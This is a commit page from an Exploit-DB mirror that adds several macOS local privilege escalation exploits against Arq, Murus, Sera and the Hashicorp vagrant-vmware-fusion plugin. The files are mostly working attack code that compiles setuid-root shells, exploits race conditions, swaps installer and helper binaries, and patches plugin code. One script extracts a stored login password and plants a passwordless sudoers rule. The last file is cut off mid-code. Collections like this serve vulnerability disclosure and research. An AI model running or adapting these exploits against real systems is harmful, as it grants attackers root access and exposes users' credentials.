bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-07

Browse source 
13 changes to exploits/shellcodes

Arq 5.9.7 - Local Privilege Escalation
Murus 1.4.11 - Local Privilege Escalation
Arq 5.9.6 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation
Sera 1.2 - Local Privilege Escalation / Password Disclosure
Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation
Proxifier for Mac 2.19 - Local Privilege Escalation
FS Makemytrip Clone - 'id' SQL Injection
WinduCMS 3.1 - Local File Disclosure
FS Shaadi Clone - 'token' SQL Injection
This commit is contained in:
Offensive Security 2017-12-07 05:02:26 +00:00
parent 5e7ce1be28
commit 08d2346400
14 changed files with 1197 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

88
exploits/macos/local/43216.rb Executable file
View file

@ -0,0 +1,88 @@
=begin
As well as the other bugs affecting Arq <= 5.9.6 there is also another issue
with the suid-root restorer binaries in Arq for Mac. There are three of them
and they are used to execute restores of backed up files from the various
cloud providers.
After reversing the inter-app protocol I discovered that the path to the
restorer binary was specified as part of the data packet sent by the UI. After
receiving this, the restorer binaries then set +s and root ownership on this
path. This means we can specify an arbitrary path which will receive +s and root
ownership.
This issue is fixed in Arq 5.10.
=end
#!/usr/bin/env ruby
##################################################################
###### Arq <= 5.9.7 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
##################################################################
s = File.stat("/Applications/Arq.app/Contents/Resources/standardrestorer")
if s.mode != 0104755 or s.uid != 0
puts "Not vulnerable - standardrestorer is not suid root."
exit 1
end
binary_target = "/tmp/arq_597_exp"
d = "\x01\x00\x00\x00\x00\x00\x00\x00"
e = "\x00\x00\x00\x00\x03"
z = "0000"
target = sprintf("%s%s-%s-%s-%s-%s%s%s", z,z,z,z,z,z,z,z)
plist = "<plist version=\"1.0\"><dict><\/dict><\/plist>"
backup_set = "0" * 40
hmac = "0" * 40
payload = sprintf(
"%s%s%s%s\$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30\x2e\x30" +
"\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s\x00\x00\x00%s" +
"\x00\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00\x00\x00%s\x00\x00" +
"\x00%s\x00\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00\x00\x00\x00\x00\x00" +
"\x14\x00%s\x00\x00\x00\x00\x03%s\x0a",
d, binary_target.length.chr, binary_target,
d, target,
d, plist.length.chr, plist,
d, backup_set,
d, d, d, hmac,
d, d, d, e * 10
)
shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);"+
"execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{binary_target};/bin/bash\","+
"NULL);return 0; }"
IO.popen("gcc -xc -o #{binary_target} -", mode="r+") do |io|
io.write(shellcode)
io.close
end
IO.popen("/Applications/Arq.app/Contents/Resources/standardrestorer " +
"2>/dev/null", mode="r+") do |io|
io.getc && io.write(payload)
end
timeout=3
i=0
while (s = File.stat(binary_target)) && (s.mode != 0104755 or s.uid != 0)
sleep 0.1
i += 1
if i >= (timeout * 10)
break
end
end
if s.mode == 0104755 and s.uid == 0
system(binary_target)
exit 0
end
puts "exploit failed"

89
exploits/macos/local/43217.sh Executable file
View file

@ -0,0 +1,89 @@
# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus
# firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.
# If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access
# without the user knowing.
# https://m4.rkw.io/murus1.4.11.sh.txt
# 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301
# -------------------------------------------------------------------------------
#!/bin/bash
##################################################################
###### Murus 1.4.11 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
##################################################################
echo "compiling payloads..."
cat > /tmp/murus411_exp.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
return 0;
}
EOF
gcc -o /tmp/murus411_exp /tmp/murus411_exp.c
if [ ! $? -eq 0 ] ; then
rm -f /tmp/murus411_exp.c
echo "failed to compile, dev tools may not be installed"
exit 1
fi
rm -f /tmp/murus411_exp.c
cat > /tmp/murus411_exp2.c <<EOF
#include <unistd.h>
#include <stdlib.h>
int main()
{
setuid(0);
seteuid(0);
system("chown root:wheel /tmp/murus411_exp");
system("chmod 4755 /tmp/murus411_exp");
system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
Murus.app/Contents/MacOS/Murus");
execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
return 0;
}
EOF
gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
rm -f /tmp/murus411_exp2.c
echo "waiting for loader..."
while :
do
ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
|grep -v grep 1>/dev/null
if [ $? -eq 0 ] ; then
break
fi
done
echo "planting payload..."
mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
Contents/MacOS/Murus.orig
mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus
echo "waiting for payload to trigger..."
while :
do
r=`ls -la /tmp/murus411_exp |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
done
echo "kapow"
/tmp/murus411_exp

78
exploits/macos/local/43218.sh Executable file
View file

@ -0,0 +1,78 @@
# Arq Backup from Haystack Software is a great application for backing up macs and
# windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
# vulnerable to a local root privilege escalation exploit.
# The updater binary has a "setpermissions" function which sets the suid bit and
# root ownership on itself but it suffers from a race condition that allows you to
# swap the destination for these privileges using a symlink.
# We can exploit this to get +s and root ownership on any arbitrary binary.
# Other binaries in the application also suffer from the same issue.
# This was fixed in Arq 5.9.7.
# https://m4.rkw.io/arq_5.9.6.sh.txt
# 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
# ------------------------------------------------------------------------------
#!/bin/bash
##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ####
##################################################################
vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`
cwd="`pwd`"
if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi
cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl(
"/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
NULL
);
return 0;
}
EOF
gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c
ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater
./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater
i=0
timeout=10
while :
do
r=`ls -la ./arq_updater |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq $timeout ] ; then
rm -f ./arq_updater
echo "Not vulnerable"
exit 1
fi
done
./arq_updater

161
exploits/macos/local/43219.sh Executable file
View file

@ -0,0 +1,161 @@
# Another day, another root privesc bug in this plugin. Not quite so serious this
# time - this one is only exploitable if the user has the plugin installed but
# VMware Fusion *not* installed. This is a fairly unlikely scenario but it's a
# straight to root privesc with no user interaction so isn't the kind of thing
# that should be shipping with any software.
# This occurs because the suid root sudo helper that I have discussed in previous
# exploit writeups executes /Applications/VMware
# Fusion.app/Contents/Library/vmnet-cli
# as root, but if the application isn't installed and we're a local admin user we
# can create a fake app directory with a payload in place of vmnet-cli that gets
# executed as root.
# HashiCorp fixed this (very quickly) in 5.0.4.
# https://m4.rkw.io/vagrant_vmware_privesc_5.0.3.sh.txt
# 3c11083386b3f7352d60b327190eed4364383c0622351db5410d809f4bda746a
# ------------------------------------------------------------------------------
#!/bin/bash
echo
echo "#########################################################"
echo "# vagrant_vmware_fusion plugin 5.0.3 local root privesc #"
echo "# by m4rkw - https://m4.rkw.io/blog.html #";
echo "#########################################################"
echo "# Note: only works when VMWare Fusion is not installed. #"
echo "#########################################################"
echo
cleanup() {
exec 2> /dev/null
killall -9 vagrant 1>/dev/null 2>/dev/null
kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null
exec 2> /dev/tty
cd
rm -rf .vagrant_vmware_fusion_503_exp
rm -rf /Applications/VMware\ Fusion.app
}
if [ -e "/Applications/VMware Fusion.app" ] ; then
echo "Fusion is installed, not exploitable."
exit 1
fi
echo "setting up fake app directory..."
mkdir /Applications/VMware\ Fusion.app
if [ ! $? -eq 0 ] ; then
echo "Failed to create /Applications/VMware Fusion.app."
exit 1
fi
mkdir -p /Applications/VMware\ Fusion.app/Contents/Library/services
touch /Applications/VMware\ Fusion.app/Contents/Library/vmrun
touch /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmrun
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx <<EOF
#!/bin/bash
echo 1>&2
echo "VMware Fusion Information:" 1>&2
echo "VMware Fusion 10.0.1 build-6754183 Release" 1>&2
echo
EOF
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli <<EOF
#!/bin/bash
chown root:wheel /tmp/vvp_503
chmod 4755 /tmp/vvp_503
EOF
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli
echo "compiling payload..."
cat > /tmp/vvp_503.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f /tmp/vvp_503; /bin/bash",NULL);
return 0;
}
EOF
gcc -o /tmp/vvp_503 /tmp/vvp_503.c
rm -f /tmp/vvp_503.c
cd
mkdir .vagrant_vmware_fusion_503_exp
cd .vagrant_vmware_fusion_503_exp
echo "writing dummy vagrantfile ..."
cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
config.vm.box = 'envimation/ubuntu-xenial'
end
EOF
echo "triggering vagrant up [stage 1]..."
vagrant up &>/dev/null &
while :
do
r=`ps auxwww |grep 'vagrant up' |grep -v grep`
if [ "$r" == "" ] ; then
break
fi
sleep 0.5
done
echo "dropping dummy machine..."
uuid=`ls -1 .vagrant/machines/default/vmware_fusion |grep -v vagrant_cwd`
touch .vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx
echo -n "`pwd`/.vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx" > .vagrant/machines/default/vmware_fusion/id
echo "triggering vagrant up [stage 2]..."
vagrant up &>/dev/null &
echo "waiting for payload to trigger ..."
count=0
success=0
while :
do
r=`ls -la /tmp/vvp_503 |grep -- '-rwsr-xr-x 1 root wheel'`
if [ "$r" != "" ] ; then
success=1
break
fi
r=`ps auxwww |grep 'vagrant up' |grep -v grep`
if [ "$r" == "" ] ; then
break
fi
sleep 0.2
count=$(($count + 1))
if [ $count -eq 250 ] ; then
echo "Timed out waiting for the payload to trigger."
cleanup
exit 1
fi
done
cleanup
if [ ! $success -eq 1 ] ; then
echo "exploit failed."
exit 1
fi
echo
cd
/tmp/vvp_503

79
exploits/macos/local/43220.sh Executable file
View file

@ -0,0 +1,79 @@
# I recently blogged about how the installation process of version 5.0.0 of this
# plugin could be hihacked by a local attacker or malware in order to escalate
# privileges to root. Hashicorp pushed some mitigations for this issue fairly
# quickly but unfortunately 5.0.1 is still exploitable with a slightly different
# approach.
# They removed the chmod/chown shell commands from their osascript invocation and
# instead simply executed their installer as root, but apparently didn't realise
# that the installer is not root-owned so can be swapped out by a local attacker
# during the process.
# This issue is fixed in version 5.0.2.
# https://m4.rkw.io/vagrant_vmware_privesc_5.0.1.sh.txt
# c38ecc9fdb4f37323338e8fd12b851133a2121f3505cde664e6d32f1ef49ba23
# -----------------------------------------------------------------------------
#!/bin/bash
echo "########################################"
echo "vagrant_vmware_fusion 5.0.1 root privesc"
echo "by m4rkw"
echo "########################################"
echo
echo "compiling..."
cat > vvf.c <<EOF
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main(int ac, char *av[])
{
setuid(0);
seteuid(0);
if (ac > 1) {
system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 /tmp/vvf_exp");
system("chown root:wheel /tmp/vvf_exp");
system("chmod 4755 /tmp/vvf_exp");
system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64.orig $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64");
system("$HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 install\012");
return 0;
}
system("rm -f /tmp/vvf_exp");
execl("/bin/bash","bash",NULL);
return 0;
}
EOF
gcc -o /tmp/vvf_exp vvf.c
rm -f vvf.c
echo "waiting for user to initiate vagrant plugin update..."
while :
do
r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant-vmware-installer_darwin_amd64'`
if [ "$r" != "" ] ; then
break
fi
done
pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64 install' |grep -v grep |xargs -L1 |cut -d ' ' -f2`
cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop
echo "dropping payload in place of installer binary..."
mv -f vagrant-vmware-installer_darwin_amd64 vagrant-vmware-installer_darwin_amd64.orig
mv -f /tmp/vvf_exp vagrant-vmware-installer_darwin_amd64
echo "waiting for payload to trigger..."
while :
do
r=`ls -la /tmp/vvf_exp 2>/dev/null |grep -- '-rwsr-xr-x' |grep root`
if [ "$r" != "" ] ; then
echo "spawning shell..."
/tmp/vvf_exp
exit 0
fi
done

46
exploits/macos/local/43221.sh Executable file
View file

@ -0,0 +1,46 @@
# Sera is a free app for mac and iOS that lets you unlock your mac automatically
# when your iphone is within a configured proximity.
# Unfortunately to facilitate this it stores the users login password in their
# home directory at:
# ~/Library/Preferences/no.ignitum.SeraOSX.plist
# This makes root privilege escalation trivial and worse than that even
# facilitates dumping the keychain as we can easily obtain the user's login
# password. If they are an admin user we can even dump items from the system
# keychain.
# The author of Sera has said he will shut the project down and make the code
# publicly available so no fix is likely to be forthcoming anytime soon.
# It is strongly recommended not to use this app and if you have done so in the
# past make sure you remove this file that contains your login password.
# https://m4.rkw.io/sera_1.2.sh.txt
# dbf4f7b64cac8a60a2c7b3ba2a3988b84a148a3f6e31bcb58d4554e5e74d8edf
# -------------------------------------------------------------------------
#!/bin/bash
##############################################################
###### sera 1.2 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
##############################################################
sera_pass=`plutil -p ~/Library/Preferences/no.ignitum.SeraOSX.plist |grep '"sera_pass"' |cut -d '"' -f4`
if [ "$sera_pass" == "" ] ; then
echo "Password not found."
exit 1
fi
echo "user's password is: $sera_pass"
user="`whoami`"
echo "$user ALL=(ALL) NOPASSWD:ALL" > /tmp/sera_12_exp
echo "$sera_pass" | sudo -S chown root:wheel /tmp/sera_12_exp 1>/dev/null 2>/dev/null
echo "$sera_pass" | sudo -S mv /tmp/sera_12_exp /etc/sudoers.d/sera_12_exp 1>/dev/null 2>/dev/null
sudo bash -c 'rm -f /etc/sudoers.d/sera_12_exp; /bin/bash'

108
exploits/macos/local/43222.sh Executable file
View file

@ -0,0 +1,108 @@
# After three CVEs and multiple exploits disclosed to Hashicorp they have finally upped their game with this plugin. Now the previously vulnerable non-root-owned
# ruby code that get executed as root by the sudo helper is no more and the sudo helper itself is one static Go binary with tightly-controlled parameters that
# can't (as far as I can tell) be exploited on its own.
# However I have discovered that the update mechanism in 5.0.0 is not completely safe. There is a bug in the update mechanism for 5.0.0 that makes it reinstall
# the plugin when you run:
# $ vagrant plugin update
# even if there is no update pending. The reinstall includes replacing the sudo helper and re-applying root ownership and the suid bit. This is done via
# osascript with a block of shell as an easy way to show a graphical popup authentication dialog to the user.
# After the credentials are entered and the permissions are applied the installer for the plugin immediately checks the hash of the sudo helper binary and if it
# doesn't match it removes it. On the surface this seemed to make a race condition impossible however after some poking around I found a way to exploit it.
# Because the authentication prompt is a guarantee of at least a few seconds pause in the intallation, we can catch this point in time very easily by scanning the
# process list watching for the invocation of osascript. Once we see this we can lay a trap by replacing the sudo helper binary with an exploit payload (remember
# this is always in a non-root-owned directory).
# As soon as the privileges are set vagrant will execute its checksum and remove the payload, however because we've caught execution at the right time and
# because the installer is a different process from the osascript process we can send a STOP signal to the installer to pause its execution. This means osascript
# will set the permissions and then the installer will not immediately remove the binary, giving us time to move our newly suid-root'd payload out of the way, use
# it to obtain root privileges, and then move the real sudo helper back into place and chmod +s it ourselves so that vagrant doesn't realise anything bad has
# happened.
# This all takes place in a second or two so the user is unlikely to notice either. Once this is done we simply send a CONT signal to the installer to allow
# it to continue as normal. The plugin is installed correctly with the right permissions, the user didn't see any errors or warnings, and we have an suid
# root payload that we can execute to spawn a root shell.
# This issue is fixed in version 5.0.1.
# https://m4.rkw.io/vagrant_vmware_privesc_5.0.0.sh.txt
# cdbdf9e620eba0d897a3ef92b6872dbb0b194eaf548c23953a42678a566f71f0
# -------------------------------------------------------------------------------
#!/bin/bash
echo "########################################"
echo "vagrant_vmware_fusion 5.0.0 root privesc"
echo "by m4rkw"
echo "########################################"
echo
echo "compiling..."
cat > vvf.c <<EOF
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main(int ac, char *av[])
{
setuid(0);
seteuid(0);
if (ac > 1) {
system("chown root vagrant_vmware_desktop_sudo_helper_darwin_amd64");
system("chmod 4755 vagrant_vmware_desktop_sudo_helper_darwin_amd64");
return 0;
}
system("rm -f /tmp/vvf_exp");
execl("/bin/bash","bash",NULL);
return 0;
}
EOF
gcc -o /tmp/vvf_exp vvf.c
rm -f vvf.c
echo "waiting for user to initiate vagrant plugin update..."
while :
do
r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant_vmware_desktop_sudo_helper_darwin_amd64'`
if [ "$r" != "" ] ; then
break
fi
done
pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64' |grep -v grep |xargs -L1 |cut -d ' ' -f2`
echo "pausing installer..."
kill -STOP $pid
cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.0/bin
echo "dropping payload in place of sudo helper binary..."
mv -f vagrant_vmware_desktop_sudo_helper_darwin_amd64 vagrant_vmware_desktop_sudo_helper_darwin_amd64.orig
mv -f /tmp/vvf_exp vagrant_vmware_desktop_sudo_helper_darwin_amd64
echo "waiting for suid..."
while :
do
r=`ls -la vagrant_vmware_desktop_sudo_helper_darwin_amd64 |grep -- '-rwsr-xr-x' |grep root`
if [ "$r" != "" ] ; then
echo "moving the real helper back into place..."
mv -f ./vagrant_vmware_desktop_sudo_helper_darwin_amd64 /tmp/vvf_exp
mv -f vagrant_vmware_desktop_sudo_helper_darwin_amd64.orig vagrant_vmware_desktop_sudo_helper_darwin_amd64
echo "fixing perms..."
/tmp/vvf_exp 1
echo "allow vagrant to continue..."
kill -CONT $pid
echo "spawning shell..."
/tmp/vvf_exp
exit 0
fi
done

219
exploits/macos/local/43223.sh Executable file
View file

@ -0,0 +1,219 @@
# I have previously disclosed a couple of bugs in Hashicorp's vagrant-vmware-fusion plugin for vagrant.
# Unfortunately the 4.0.23 release which was supposed to fix the previous bug I reported didn't address the issue, so Hashicorp quickly put out another release
# - 4.0.24 - after that (but didn't update the public changelog on github).
# Unfortunately 4.0.24 is still vulnerable, largely due to a fundamental design flaw in the way the plugin is written combined with the need to elevate
# privileges for certain functions within Fusion.
# Because Hashicorp need users to be able to update the plugin as the local non-root user the encrypted ruby code that the plugin is comprised of must
# remain owned by the non-root user. This means there is a huge attack surface that we can exploit to manipulate the execution of the program and still get
# root on 4.0.24.
# I wrote this exploit before Fusion 10 was released and on the surface 4.0.24 is not compatible with Fusion 10. Curiously though it can be fairly easily tricked
# into working (at least partially) with Fusion 10 simply by patching out the version check and creating a symlink. I discovered this while trying to get the
# 4.0.24 exploit working with Fusion 10 installed - we can simply monkey-patch the version check out of the code, create a symlink for a binary that VMWare
# moved in v10 and then we're away. I was able to vagrant up and ssh into the running vm without any issues. It also means I was able to update the exploit so
# that it works on Fusion 8.x and Fusion 10.
# This seems to be (finally!) fixed properly in 4.0.25 by replacing the suid helper binary with a new go binary that contains all the required elevated
# operations and doesn't call back to the vulnerable ruby code.
# https://m4.rkw.io/vagrant_vmware_privesc_4.0.24_v8-10.sh.txt
# 30d54139620bf8e805805d34aa54f4f348b7371642828b28cd0f8c5a7a65c0e8
# -----------------------------------------------------------------------------
#!/bin/bash
echo
echo "**********************************************************"
echo "* vagrant_vmware_fusion plugin 4.0.24 local root privesc *"
echo "* by m4rkw - https://m4.rkw.io/blog.html *";
echo "**********************************************************"
echo "* works against vmware fusion 8.x and 10.x - even though *"
echo "* 4.0.24 is not compatible with 10.x, we patch out the *"
echo "* version check ;) *"
echo "**********************************************************"
echo
cleanup() {
exec 2> /dev/null
killall -9 vagrant 1>/dev/null 2>/dev/null
kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null
exec 2> /dev/tty
x=`pwd |sed 's/.*\///'`
if [ "$x" == ".vagrant_vmware_fusion_4024_exp" ] ; then
cd ..
rm -rf .vagrant_vmware_fusion_4024_exp
fi
cd
rm -rf .vagrant_vmware_fusion_4024_exp
if [ -e "$target1.bak" ] ; then
mv -f $target1.bak $target1
fi
if [ -e "$target2.orig" ] ; then
mv -f $target2.orig $target2
fi
}
vuln=`find ~/.vagrant.d//gems/2.3.4/gems/vagrant-vmware-fusion-4.0.24/bin -type f -perm +4000`
if [ "$vuln" == "" ] ; then
echo "Vulnerable suid binary not found. It gets +s after the first vagrant up."
exit 1
fi
mkdir .vagrant_vmware_fusion_4024_exp
cd .vagrant_vmware_fusion_4024_exp
echo "Looking for a vmware_desktop vagrant box ..."
box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1`
download=0
if [ "$box" == "" ] ; then
download=1
echo "No box found, defaulting to envimation/ubuntu-xenial ..."
box="envimation/ubuntu-xenial"
fi
echo "Writing a dummy vagrantfile ..."
cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
config.vm.box = '$box'
end
EOF
echo "Compiling the shell invoker ..."
cat > /tmp/v.c <<EOF2
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f /tmp/v; /bin/bash",NULL);
return 0;
}
EOF2
gcc -o /tmp/v /tmp/v.c
rm -f /tmp/v.c
echo "Looking for the sudo_helper_cli.rb ..."
target1=`find ~/.vagrant.d/ -name sudo_helper_cli.rb |grep vagrant-vmware-fusion-4.0.24`
if [ $target1 == "" ] ; then
cleanup
echo "sudo_helper_cli.rb version 4.0.24 not found"
exit 1
fi
echo "Installing ruby payload ..."
if [ ! -e "$target1.bak" ] ; then
mv -f $target1 $target1.bak
if [ ! $? -eq 0 ] ; then
cleanup
echo "Unable to rename $target1, may not be exploitable."
exit 1
fi
fi
cat > $target1 <<EOF
#!/usr/bin/env ruby
class HashiCorp::VagrantVMwarefusion::SudoHelperCLI
def run(x)
\`chown root:wheel /tmp/v\`
\`chmod 4755 /tmp/v\`
end
end
EOF
if [ ! $? -eq 0 ] ; then
cleanup
echo "Unable to write to $target1, may not be exploitable."
exit 1
fi
vc=`/Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx -v 2>&1 |grep 'VMware Fusion 10.'`
if [ "$vc" != "" ] ; then
echo "Fusion 10.x detected, Patching out the version check ..."
target2=`find ~/.vagrant.d/ -name driver.rb |grep vagrant-vmware-fusion-4.0.24`
if [ "$target2" == "" ] ; then
cleanup
echo "driver.rb version 4.0.24 not found"
exit 1
fi
if [ ! -e "$target2.orig" ] ; then
mv -f $target2 $target2.orig
if [ ! $? -eq 0 ] ; then
cleanup
echo "Unable to rename $target2, may not be exploitable."
exit 1
fi
fi
cat > $target2 <<EOF
load File.dirname(__FILE__) + "/driver.rb.orig"
module DriverVersionHack
def verify!
end
end
class HashiCorp::VagrantVMwarefusion::Driver::Fusion
prepend DriverVersionHack
end
EOF
fi
echo "Triggering vagrant up ..."
vagrant up &>/dev/null &
success=0
if [ $download -eq 1 ] ; then
echo "*** we need to download the vmware box so this will take a minute or two ***"
fi
echo "Waiting for payload to trigger ..."
count=0
while :
do
r=`ls -la /tmp/v |grep -- '-rwsr-xr-x 1 root wheel'`
if [ "$r" != "" ] ; then
success=1
break
fi
r=`ps auxwww |egrep '\/vagrant up$'`
if [ "$r" == "" ] ; then
break
fi
sleep 0.2
count=$(($count + 1))
if [ $count -eq 150 ] ; then
echo "Timed out waiting for the payload to trigger."
cleanup
exit 1
fi
done
cleanup
if [ ! $success -eq 1 ] ; then
echo "Exploit failed."
exit 1
fi
echo
/tmp/v

138
exploits/macos/local/43224.sh Executable file
View file

@ -0,0 +1,138 @@
# A couple of weeks ago I disclosed a local root privesc in Hashicorp's
# vagrant-vmware-fusion plugin:
#
# https://m4.rkw.io/blog/cve20177642-local-root-privesc-in-hashicorp-vagrantvmw...
#
# The initial patch they released was 4.0.21 which unfortunately contained a bug
# that prevented it from working at all on mac systems so I was unable to test it.
# I then had to give my mac to Apple for a couple of weeks for some repairs so
# only got around to testing 4.0.22 at the end of last week.
#
# Unfortunately, 4.0.22 is still exploitable and the subsequent release of 4.0.23
# did not fix the issue. Hashicorp reacted much faster this time, taking only a
# few days to issue a patch instead of a few months and 4.0.24 does fix the issue.
#
# As discussed before the plugin installs a "sudo helper" encrypted ruby script
# and four architecture-specific wrappers into
# ~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin
#
# vagrant_vmware_desktop_sudo_helper
# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386
# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
# vagrant_vmware_desktop_sudo_helper_wrapper_linux_386
# vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64
#
# The wrapper that matches the system architecture will be made suid root the
# first time any vagrant box is up'd. When a vagrant box is started the wrapper
# script elevates privileges and then executes the ruby sudo helper script.
#
# Previously I exploited the unsanitised system("ruby") call to simply invoke the
# wrapper directly and execute an arbitrary fake "ruby" script in the current PATH.
# This is now mitigated with 4.0.22 because the wrapper refuses to execute if it's
# not being called by vagrant.
#
# Unfortunately it's still possible to exploit it because the wrapper executes the
# sudo helper as root, and the sudo helper is not root-owned so we can overwrite it
# with any arbitrary ruby code which will then get executed as root when vagrant up
# is run.
#
# The issue was reported to Hashicorp on 27/07/17 and fixed on 01/08/17.
#
# This exploit requires a vmware_fusion box to be present on the system in order to
# work. If you don't have one it may take a few minutes to download one. Like
# last time it targets darwin 64bit but it's likely the other architectures are
# vulnerable too.
#
# https://m4.rkw.io/vagrant_vmware_privesc_4.0.23.sh.txt
# 81c2637cd1f4064c077aabc6fa7a3451ae3f2bd99c67f25c966728f88a89d5a1
# --------------------------------------------------------------------------
#!/bin/bash
echo
echo "****************************************************************"
echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *"
echo "* m4rkw *"
echo "****************************************************************"
echo
echo "Shouts to #coolkids"
echo
vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1`
target="/tmp/vagrant_vmware_privesc_4.0.23"
if [ "$vuln_bin" == "" ] ; then
echo "Vulnerable binary not found."
exit 1
fi
if [ -e "$target" ] ; then
echo "Exploit payload already present."
$target
exit
fi
box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1`
if [ "$box" == "" ] ; then
echo "No vmware_fusion boxes found locally, we will have to download one."
echo
echo "This will take a few minutes."
echo
box="bento/ubuntu-16.04"
fi
dir=`dirname "$vuln_bin"`
cd "$dir"
if [ ! -e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then
mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak
fi
cat > $target.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
